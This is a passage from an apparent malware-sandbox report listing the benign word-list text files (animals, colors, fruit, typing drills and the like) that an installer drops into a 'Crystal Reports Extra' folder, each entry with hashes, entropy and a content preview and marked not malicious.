                                                          SHA-512:D5AEC644F8CBE68F8689597D2BAA4660455E4005DF56269FC612182A946C2718B8B0B6872EFD5F72DC69DEF48F59CAD24112E7874101034A56344044F4F229BB
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Alphabet.A.B.C.D.E.F.G.H.I.J.K.L.M.N.O.P.Q.R.S.T.U.V.W.X.Y.Z.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\words\animals.txt (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):893
                                                          Entropy (8bit):4.259394608447225
                                                          Encrypted:false
                                                          SSDEEP:24:KbP7ohYAegvAwqZASWvVagm62F5xclQL7bX5FL2:I6YAegv86a562f2lcnbL2
                                                          MD5:C9FF7015CBA0A58728C49B05FA99993A
                                                          SHA1:9B6B8341A6BBB3F8FC4608F74BB67914F7FA9606
                                                          SHA-256:13CB97C43586C2167E7487554E98850BEF9B3FBA26D7CE5CF208461B704A4D0E
                                                          SHA-512:8E80151BA293ACAB0E1C199058C3CC70B76758EB3FD8790BB5B5A0ADC5C75DD344CE5DCF535886493C37A1E216E15D0C286C4E551DB8EBB0B0E4DD5B9911D129
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Animals.ALLIGATOR.ANT.ANTELOPE.APE.BABOON.BADGER.BAT.BEAR.BEAVER.BEE.BISON.BUFFALO.BULL.BUTTERFLY.CAMEL.CAT.CATTLE.CHEETAH.CHICKEN.CHIPMUNK.COBRA.COCKROACH.CORMORANT.COW.COYOTE.CRAB.CRANE.CROCODILE.CROW.DEER.DOG.DOGFISH.DOLPHIN.DONKEY.DOVE.DUCK.EAGLE.ECHIDNA.EEL.ELAND.ELEPHANT.ELK.EMU.FALCON.FERRET.FINCH.FISH.FLAMINGO.FLY.FOX.FROG.GAZELLE.GERBIL.GIRAFFE.GNU.GOAT.GOOSE.GORILLA.GUANACO.GULL.HAMSTER.HARE.HAWK.HEDGEHOG.HERON.HIPPO.HOG.HOMET.HORSE.HUMAN.HYENA.JACKAL.JAGUAR.JELLYFISH.KANGAROO.KOALA.LADYBUG.LEOPARD.LION.LLAMA.LOBSTER.LYNX.MANATEE.MIDGE.MINK.MOLE.MONKEY.MOOSE.MOSQUITO.MOUSE.OSTRICH.OTTER.OWL.OX.OYSTER.PANDA.PARROT.PARTRIDGE.PEACOCK.PELICAN.PENGUIN.PIG.PIGEON.RABBIT.RACCOON.RAM.RAT.RAVEN.REINDEER.RHINO.ROOK.SEAGULL.SEAHORSE.SEASTAR.SEAL.SHARK.SHEEP.SNAIL.SNAKE.SPARROW.SPIDER.SQUIRREL.STAG.STARFISH.SWALLOW.SWAN.TIGER.TOAD.TURKEY.TURTLE.WALRUS.WASP.WHALE.WOLF.WORM.YAK.ZEBRA.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\words\astronomy.txt (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):488
                                                          Entropy (8bit):4.186292973460784
                                                          Encrypted:false
                                                          SSDEEP:12:p2mUlUp1ok9BtTeHqhw6iq3q3jOpz5u3u+VQwv:+lEyruw6J4y3kVQ4
                                                          MD5:18406EFA6EF1A905F31541276638583D
                                                          SHA1:0738F28BEC885DE8C51F08F9CFDD5BA01A0097BD
                                                          SHA-256:7D1C0767DE14B8E1836293253433496568AA9D98EF54EA0147B71E011CB4311D
                                                          SHA-512:BBDD4087BBAC7CEBF9FA786CB71E6EBC69EF8375962A9541DF7C2FE908F6699FD70A0F92B4D0A40D42B330813B6910D4CDB02D6E5083E453D5177AFC0F151F10
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Astronomy.ALBEDO.ALPHA.ASTEROID.BETA.CLUSTER.COMET.COSMIC.COSMOS.COSMOGONY.COSMOLOGY.DELTA.DUST.DWARF.EARTH.ECLIPSE.ECLIPTIC.FLARE.GALACTIC.GALAXY.GAMMA.GIANT.GALILEAN.HALO.HELIOCENTRIC.INTERSTELLAR.ION.IONIC.IONOSPHERE.JUPITER.LATITUDE.LIMB.MAGNETIC.MAGNETOSPHERE.MARS.MERCURY.MERIDIAN.METEOR.MOON.NEBULA.NEUTRON.NEWTONIAN.NEPTUNE.NOVA.ORBIT.PHOTON.PHOTOSPHERE.PLANET.PLUTO.PULSAR.QUASAR.SATELLITE.SATURN.SIDEREAL.SOLAR.SPACE.STAR.SUN.SUNSPOT.SUPERNOVA.TERRESTRIAL.UNIVERSE.URANUS.VENUS.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\words\colors.txt (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):144
                                                          Entropy (8bit):4.188809416596911
                                                          Encrypted:false
                                                          SSDEEP:3:IFergnedhsV+xnhvUgSMB3RrkB9G81wT9ryHJEg+vp6vPu+lv:genPzfv5JYNO9WHJEbx6vPPlv
                                                          MD5:70FEBE5A878CD95E91B69AFF631A7681
                                                          SHA1:8D86EB3DAB81588A3E7EC319B3C209C0A702EC9E
                                                          SHA-256:4A6B55D4E6D3CBCDC703FD6AEDDD432E914ABE730B30AD8E54A7C771AFE6F11F
                                                          SHA-512:C94425E9C1622E81C28E884FF9C0FC9733370BFF3427DC8B3888855AF5273FE898F94680E27AA821B04AF218E4921041E86AF24B8B7F9C635FED76E8E30A2207
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Colors.RED.PINK.BLUE.CYAN.LIME.GRAY.TEAL.GOLD.GREEN.BROWN.SILVER.MAROON.ORANGE.VIOLET.YELLOW.PURPLE.BRONZE.INDIGO.MAGENTA.LAVENDER.BLACK.WHITE..
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\words\fingers.txt (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):131
                                                          Entropy (8bit):4.5244587363903594
                                                          Encrypted:false
                                                          SSDEEP:3:+7XGJYxanNd3uOwgr5UyRvtE58iUKrmN9Gj/DV9xav3Lv:+KDnNd3trWOE9UKrmv0rIv3Lv
                                                          MD5:CCC1AB4D4F6D68E026916B785700131B
                                                          SHA1:0E1151C2E660AE43E5D10F79C02B2BA818DF2C61
                                                          SHA-256:578A87637F227EE95C41FE11D084EF4E85CB8833A270A9864EE533E4BCBC25E0
                                                          SHA-512:5D31C7C91E1386680181042B1CCA74819E18118ACB10341103C4BEBD1E84FEB9B863BE1AF5D0EC8D45298076FBB6C9CB4DB6A7EEDE801CF9A6CCD51572A20BE4
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Finger Exercises.FTC.TFC.ASFD.SAFD.JKL.KIK.WSX.SXW.DEC.DCE.ECD.UIOP.POIU.HYN.NHY.NYH.GTB.BGT.VCXZ.ZXCV.FVR.RFV.FVR.SWX.WXS.JUJ.RFR.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\words\fruit.txt (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):140
                                                          Entropy (8bit):4.180613213396753
                                                          Encrypted:false
                                                          SSDEEP:3:LvgqMi1yj0R2k3osqrvDxX5vq4sGx+3k5+pwDkkZ1vUp6ysH:Lvgo1yjkosq7ZM4eg+pw4kHvHf
                                                          MD5:06DE8967661F6D2BB8D9E2C0BC817D8B
                                                          SHA1:7F6A460872A05F4AB3215C8D36F266581CE1CEC5
                                                          SHA-256:78674120D9B926FE8169FA676FB61B4D7D65631439DA51E641BD8181DB6F8A35
                                                          SHA-512:901F209982D5EF9E805BD5C60158CF8ABA7FD22D10851CB1822F65F645871AA36FF2A383C2A52B769A45AF56EB921C111814A89122D2CE2EB73CDBFCCFB40769
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Fruit.APPLE.ORANGE.PEAR.LEMON.LIME.KUMQUAT.GRAPE.BANANA.MELON.SATSUMA.PEACH.GRAPEFRUIT.STRAWBERRY.BLUEBERRY.BLACKBERRY.RASPBERRY.KIWI.MANGO.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\words\geography.txt (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):120
                                                          Entropy (8bit):4.218834559547659
                                                          Encrypted:false
                                                          SSDEEP:3:zLBFmKLBRWv+yVsKLreoysYjXgaUt8wwpu8xpklsosjyJUm:nKKLWvlr3mpUmF9pklBs+JUm
                                                          MD5:A4ABB7B3436DF111EE40AF6725B18113
                                                          SHA1:9283AD1362ACCCE89E48ABCEDD9628C208B23ABC
                                                          SHA-256:31EA6B1AED3AA363F1332F4265915CE5D5EE738D1D7573834B592B79D18C9838
                                                          SHA-512:A8EEC92A409356DB9FC654481C0FF296E741C5C8F165BB5690CC83AF027C1A5D14A9398EBE81D41637F6F39FB9B34AA8218794D36C1FAEA9D0AA76C93F79AEE3
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Oceans and Continents.NORTH AMERICA.SOUTH AMERICA.AFRICA.EUROPE.ASIA.AUSTRALIA.ANTARCTICA.ATLANTIC.PACIFIC.INDIAN.ARCTIC
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\words\is-2152V.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):882
                                                          Entropy (8bit):4.147698276575406
                                                          Encrypted:false
                                                          SSDEEP:24:qOUGKuqd7IUZbKg0UpZKUC5tB2eD0xGriqvjl7aDAksITd+Y:qjuw7IKKVUpS5tB2eDaGuqvVaDAHITdL
                                                          MD5:861CABFDC0A36F9665146B15DE26807C
                                                          SHA1:CC63FE7D78A3B6F3AEDEB43B061B954A0B4267F5
                                                          SHA-256:A3806CAAF1BA12893A9D85C8CF12D2E890145A13A34848FFD0107C2128C7D058
                                                          SHA-512:0985102FCAEA29ACD4754F15029222DFF44B60C189EC740C97464E625BE6788D2B461E1308429E14EB768CA0DEF807FD6A2AC85BBF29DCA2822AEF5E96E84223
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Short Words.MY.ON.AGE.AID.ALL.AND.ANT.ASK.ART.AWE.AXE.BAD.BAG.BAR.BEE.BEG.BET.BID.BIN.BIT.BOO.BOW.BOY.BRO.BUG.BUM.BUS.BUY.BYE.CAM.CAN.CAP.CAR.CAT.CAY.COP.COW.CRY.CUT.DOG.DIG.DIP.DRY.DYE.EAR.EAT.EEL.EEG.ELF.END.EON.ERA.EYE.FAD.FAN.FEW.FIG.FIN.FIT.FIX.FOR.FRY.FUN.FUR.HAD.HAM.HAT.HEN.HER.HIM.HOD.HOG.HOP.HUB.HUN.ILL.INN.LAP.LAY.LEG.MAD.MAN.MAP.MAT.MOM.MOP.MUD.MUG.NAP.NOD.NOW.NUN.NUT.OAK.ODD.OFF.OIL.ONE.OUR.OWL.OWN.PAY.PIG.PAW.PEN.PET.POP.RAT.RAW.RAY.RED.RID.RIM.RIP.ROD.RUN.SAD.SAW.SAY.SEE.SKY.SLY.TAP.TEA.THE.TIN.TIP.TOO.TOP.TOY.TRY.TWO.TYE.VET.WAR.WET.WHO.WHY.WIN.WON.YES.ZIP.ZOO.ABLE.ACHE.ACID.BAIT.BAKE.BAND.BATH.BULL.CAMP.CAPE.CARE.COIN.COST.DARE.DART.DEBT.DOLL.DOOM.DOOR.EASY.EPIC.ETCH.EVIL.EXIT.FACT.FADE.FEED.FILL.FISH.FOIL.FOND.FREE.FUSS.GLAD.GULP.HELP.KEEP.KIND.LAND.LEAD.LINE.MEAN.MIND.MOVE.NEWS.PINE.PLOT.QUIT.SAND.SEEM.SELL.SEND.SIGN.SOON.STAR.TALL.TIME.VIEW.YELL.ZOOM.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\words\is-2TJIF.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):1799
                                                          Entropy (8bit):4.2349912514036845
                                                          Encrypted:false
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Long Words.ACTOR.ADAPTER.ADVANCE.ADVENT.AGENCY.AGENDA.AHEAD.AIRSHIP.ALARM.ALLIES.ALPHABET.AMATEUR.AMAZED.ANARCHY.ANCHOR.ANGEL.ANTENNA.ANTIQUE.APPRIZE.ASTRAL.ATTITUDE.AUREUS.AVATAR.BALLOON.BATTERY.BECKON.BECOME.BEETLE.BEFORE.BEGINS.BEHALF.BEHAVE.BEHIND.BEHOLD.BEING.BELIEF.BELONG.BESIDE.BETTER.BEYOND.BLESS.BOREDOM.BOUGHT.BUDGET.CANVAS.CAPTAIN.CARCASS.CENTURY.CHAOS.CHAOTIC.CHEAT.CHEMIST.CHIMERA.CHURCH.CLASP.CLOCK.CLONING.COLONEL.COMMON.COMPANY.CONFIRM.COUNCIL.COURT.CREDIT.CROSSED.CURRANT.DECOY.DEDUCE.DEFENSE.DEGREE.DEMON.DESIRE.DESSERT.DEVELOP.DEVOUR.DIMMER.DINGER.DISBAND.DISCORD.DISMAY.DIVORCE.DONKEY.DRAGON.DREAMER.DROID.DROOL.EARLIER.EATING.ECOTYPE.ELEGANT.EMPIRE.ENZYME.EPILOGUE.ERROR.ETHICS.EXPORT.EXPRESS.EXTRACT.FAKIR.FAMILY.FEUDAL.FIANCEE.FLAME.FLOAT.FLOOR.FOOLISH.FOREARM.FOSSIL.FOUGHT.FRIGATE.FRILL.FUN.GABBLE.GALLON.GARAGE.GHOST.GLASS.GLIDING.GRAPHIC.GRAVE.GREAT.GREEN.GRUMBLE.HARMONY.HAUNTED.HIGHER.HIGHWIRE.HUMORIST.HUNGRY.HUNTED.HUNTER.IDEAL.IMMORTAL.IMPLORE.INCOME.INSULT.INVERT.IS
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\words\is-6MUN6.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):380
                                                          Entropy (8bit):4.233468493292691
                                                          Encrypted:false
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Plants.ABELIA.ALOE.ACACIA.ASPARAGUS.AZALEA.BANANA.BASIL.BEAN.BEGONIA.BERRY.BLUEBERRY.CAMELLIA.CHERRY.COCOS.COFFEE.CORN.CRANESBILL.CROCUS.DAFFODIL.DAHLIA.DAISY.DIANTHUS.DOGWOOD.FICUS.FIG.FUCHSIA.GERANIUM.JASMINE.LILY.LAURUS.MALVA.MARIGOLD.ORCHID.OREGANO.PANSY.PARSLEY.PEAR.PEONY.PETUNIA.PINEAPPLE.POTATO.PUMPKIN.RHUBARB.RICE.ROSE.ROSEMARY.RUSHES.SQUASH.TOMATO.VERBENA.YUCCA.ZINNIA.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\words\is-D6LE6.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):893
                                                          Entropy (8bit):4.259394608447225
                                                          Encrypted:false
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Animals.ALLIGATOR.ANT.ANTELOPE.APE.BABOON.BADGER.BAT.BEAR.BEAVER.BEE.BISON.BUFFALO.BULL.BUTTERFLY.CAMEL.CAT.CATTLE.CHEETAH.CHICKEN.CHIPMUNK.COBRA.COCKROACH.CORMORANT.COW.COYOTE.CRAB.CRANE.CROCODILE.CROW.DEER.DOG.DOGFISH.DOLPHIN.DONKEY.DOVE.DUCK.EAGLE.ECHIDNA.EEL.ELAND.ELEPHANT.ELK.EMU.FALCON.FERRET.FINCH.FISH.FLAMINGO.FLY.FOX.FROG.GAZELLE.GERBIL.GIRAFFE.GNU.GOAT.GOOSE.GORILLA.GUANACO.GULL.HAMSTER.HARE.HAWK.HEDGEHOG.HERON.HIPPO.HOG.HOMET.HORSE.HUMAN.HYENA.JACKAL.JAGUAR.JELLYFISH.KANGAROO.KOALA.LADYBUG.LEOPARD.LION.LLAMA.LOBSTER.LYNX.MANATEE.MIDGE.MINK.MOLE.MONKEY.MOOSE.MOSQUITO.MOUSE.OSTRICH.OTTER.OWL.OX.OYSTER.PANDA.PARROT.PARTRIDGE.PEACOCK.PELICAN.PENGUIN.PIG.PIGEON.RABBIT.RACCOON.RAM.RAT.RAVEN.REINDEER.RHINO.ROOK.SEAGULL.SEAHORSE.SEASTAR.SEAL.SHARK.SHEEP.SNAIL.SNAKE.SPARROW.SPIDER.SQUIRREL.STAG.STARFISH.SWALLOW.SWAN.TIGER.TOAD.TURKEY.TURTLE.WALRUS.WASP.WHALE.WOLF.WORM.YAK.ZEBRA.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\words\is-D776U.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):61
                                                          Entropy (8bit):3.793328115293812
                                                          Encrypted:false
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Alphabet.A.B.C.D.E.F.G.H.I.J.K.L.M.N.O.P.Q.R.S.T.U.V.W.X.Y.Z.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\words\is-D7K8O.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):131
                                                          Entropy (8bit):4.5244587363903594
                                                          Encrypted:false
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Finger Exercises.FTC.TFC.ASFD.SAFD.JKL.KIK.WSX.SXW.DEC.DCE.ECD.UIOP.POIU.HYN.NHY.NYH.GTB.BGT.VCXZ.ZXCV.FVR.RFV.FVR.SWX.WXS.JUJ.RFR.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\words\is-ECN20.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):1444
                                                          Entropy (8bit):4.247765748971925
                                                          Encrypted:false
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Medium Words.ACID.ADULT.AGENT.AHEAD.ALARM.ANGEL.ARMY.BADLY.BASE.BASES.BEAST.BEGIN.BITE.BLACK.BLANK.BLESS.BLUE.BREAK.BUDGET.BULL.BUOY.BURY.CAGE.CELLO.CHAOS.CHEAT.CLEAN.CLEAR.CLOCK.CLOSE.CLOWN.COBRA.CODER.COULD.COURT.CREEP.CREW.CROSS.DANDY.DAWN.DECAY.DECOY.DEMON.DINER.DISC.DISCO.DISK.DIVA.DIVE.DIVER.DONKEY.DREAD.DRIED.DRIER.DRINK.DUCK.DWELL.EAST.EQUAL.ERROR.ESSAY.EXAM.FACT.FAKE.FAKIR.FAMILY.FETCH.FIGHT.FLAME.FLAT.FLOAT.FLOOD.FLOOR.FLUTE.FOOD.FRUIT.FUN.GEESE.GENE.GHOST.GLORY.GLOVE.GLOW.GLUE.GNOME.GOAL.GOAT.GOLD.GOOSE.GRADE.GRASS.GRAVE.GRAY.GRAZE.GREEN.GREET.GRIND.GROW.HALF.HALL.HARD.HAWK.HAZY.HITCH.HOBBY.HONEY.HOOK.HORSE.HOTEL.HUMOR.ICON.IDEAL.IDLE.IDOL.INCOME.INVERT.IRON.IRONY.JACKET.JOKE.JULY.KEEN.KILT.LAWYER.LAZY.LEECH.LICK.LIFE.LIGHT.LIKE.LIVE.LOBBY.LUNCH.LURE.LYNX.MANLY.MAYBE.MEDAL.MERCY.MILK.MILKY.MINOR.MOAT.MODEL.MOOSE.MORE.MOUSE.MOVIE.NAME.NASTY.NOBLE.NORTH.NOVICE.ONLY.OPEN.PAPER.PEARL.PEEL.PEER.PHONE.PIKE.PINK.PLANK.PLANT.POLICE.POST.PUSS.QUELL.QUEST.QUIET.QUOTE.RASH.REACH.READY.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\words\is-F9M8J.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):488
                                                          Entropy (8bit):4.186292973460784
                                                          Encrypted:false
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Astronomy.ALBEDO.ALPHA.ASTEROID.BETA.CLUSTER.COMET.COSMIC.COSMOS.COSMOGONY.COSMOLOGY.DELTA.DUST.DWARF.EARTH.ECLIPSE.ECLIPTIC.FLARE.GALACTIC.GALAXY.GAMMA.GIANT.GALILEAN.HALO.HELIOCENTRIC.INTERSTELLAR.ION.IONIC.IONOSPHERE.JUPITER.LATITUDE.LIMB.MAGNETIC.MAGNETOSPHERE.MARS.MERCURY.MERIDIAN.METEOR.MOON.NEBULA.NEUTRON.NEWTONIAN.NEPTUNE.NOVA.ORBIT.PHOTON.PHOTOSPHERE.PLANET.PLUTO.PULSAR.QUASAR.SATELLITE.SATURN.SIDEREAL.SOLAR.SPACE.STAR.SUN.SUNSPOT.SUPERNOVA.TERRESTRIAL.UNIVERSE.URANUS.VENUS.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\words\is-G40DB.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):221
                                                          Entropy (8bit):4.211554812201922
                                                          Encrypted:false
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Shapes.BOX.CUBE.OVAL.MOON.SQUARE.CIRCLE.TRIANGLE.RHOMBUS.ROUND.PYRAMID.ELLIPSE.RECTANGLE.PARALLELOGRAM.PRISM.CONE.PARABOLA.HYPERBOLA.POLYGON.TETRAHEDRON.PENTAGON.HEXAGON.OCTAGON.POINT.LINE.PLANE.RAY.ANGLE.VERTEX.SIDE.FACE
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\words\is-IJOAD.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):112
                                                          Entropy (8bit):4.226830585683443
                                                          Encrypted:false
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Trees.ASH.ELM.MAPLE.OAK.PALM.PINE.REDWOOD.CYPRESS.CEDAR.HICKORY.FIR.SPRUCE.POPLAR.MAGNOLIA.BIRCH.SEQUOIA.BANYAN.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\words\is-IUHBG.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):120
                                                          Entropy (8bit):4.218834559547659
                                                          Encrypted:false
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Oceans and Continents.NORTH AMERICA.SOUTH AMERICA.AFRICA.EUROPE.ASIA.AUSTRALIA.ANTARCTICA.ATLANTIC.PACIFIC.INDIAN.ARCTIC
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\words\is-J7E1D.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):217
                                                          Entropy (8bit):3.8887876562342147
                                                          Encrypted:false
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Numbers.ZERO.ONE.TWO.THREE.FOUR.FIVE.SIX.SEVEN.EIGHT.NINE.TEN.ELEVEN.TWELVE.THIRTEEN.FOURTEEN.FIFTEEN.SIXTEEN.SEVENTEEN.EIGHTEEN.NINETEEN.TWENTY.THIRTY.FORTY.FIFTY.SIXTY.SEVENTY.EIGHTY.NINETY.HUNDRED.THOUSAND.MILLION.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\words\is-KRF65.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):140
                                                          Entropy (8bit):4.180613213396753
                                                          Encrypted:false
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Fruit.APPLE.ORANGE.PEAR.LEMON.LIME.KUMQUAT.GRAPE.BANANA.MELON.SATSUMA.PEACH.GRAPEFRUIT.STRAWBERRY.BLUEBERRY.BLACKBERRY.RASPBERRY.KIWI.MANGO.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\words\is-OK2RT.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):144
                                                          Entropy (8bit):4.188809416596911
                                                          Encrypted:false
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Colors.RED.PINK.BLUE.CYAN.LIME.GRAY.TEAL.GOLD.GREEN.BROWN.SILVER.MAROON.ORANGE.VIOLET.YELLOW.PURPLE.BRONZE.INDIGO.MAGENTA.LAVENDER.BLACK.WHITE..
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\words\numbers.txt (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):217
                                                          Entropy (8bit):3.8887876562342147
                                                          Encrypted:false
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Numbers.ZERO.ONE.TWO.THREE.FOUR.FIVE.SIX.SEVEN.EIGHT.NINE.TEN.ELEVEN.TWELVE.THIRTEEN.FOURTEEN.FIFTEEN.SIXTEEN.SEVENTEEN.EIGHTEEN.NINETEEN.TWENTY.THIRTY.FORTY.FIFTY.SIXTY.SEVENTY.EIGHTY.NINETY.HUNDRED.THOUSAND.MILLION.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\words\plants.txt (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):380
                                                          Entropy (8bit):4.233468493292691
                                                          Encrypted:false
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Plants.ABELIA.ALOE.ACACIA.ASPARAGUS.AZALEA.BANANA.BASIL.BEAN.BEGONIA.BERRY.BLUEBERRY.CAMELLIA.CHERRY.COCOS.COFFEE.CORN.CRANESBILL.CROCUS.DAFFODIL.DAHLIA.DAISY.DIANTHUS.DOGWOOD.FICUS.FIG.FUCHSIA.GERANIUM.JASMINE.LILY.LAURUS.MALVA.MARIGOLD.ORCHID.OREGANO.PANSY.PARSLEY.PEAR.PEONY.PETUNIA.PINEAPPLE.POTATO.PUMPKIN.RHUBARB.RICE.ROSE.ROSEMARY.RUSHES.SQUASH.TOMATO.VERBENA.YUCCA.ZINNIA.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\words\shapes.txt (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):221
                                                          Entropy (8bit):4.211554812201922
                                                          Encrypted:false
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Shapes.BOX.CUBE.OVAL.MOON.SQUARE.CIRCLE.TRIANGLE.RHOMBUS.ROUND.PYRAMID.ELLIPSE.RECTANGLE.PARALLELOGRAM.PRISM.CONE.PARABOLA.HYPERBOLA.POLYGON.TETRAHEDRON.PENTAGON.HEXAGON.OCTAGON.POINT.LINE.PLANE.RAY.ANGLE.VERTEX.SIDE.FACE
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\words\trees.txt (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):112
                                                          Entropy (8bit):4.226830585683443
                                                          Encrypted:false
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Trees.ASH.ELM.MAPLE.OAK.PALM.PINE.REDWOOD.CYPRESS.CEDAR.HICKORY.FIR.SPRUCE.POPLAR.MAGNOLIA.BIRCH.SEQUOIA.BANYAN.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\words\words1.txt (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):882
                                                          Entropy (8bit):4.147698276575406
                                                          Encrypted:false
                                                          SSDEEP:24:qOUGKuqd7IUZbKg0UpZKUC5tB2eD0xGriqvjl7aDAksITd+Y:qjuw7IKKVUpS5tB2eDaGuqvVaDAHITdL
                                                          MD5:861CABFDC0A36F9665146B15DE26807C
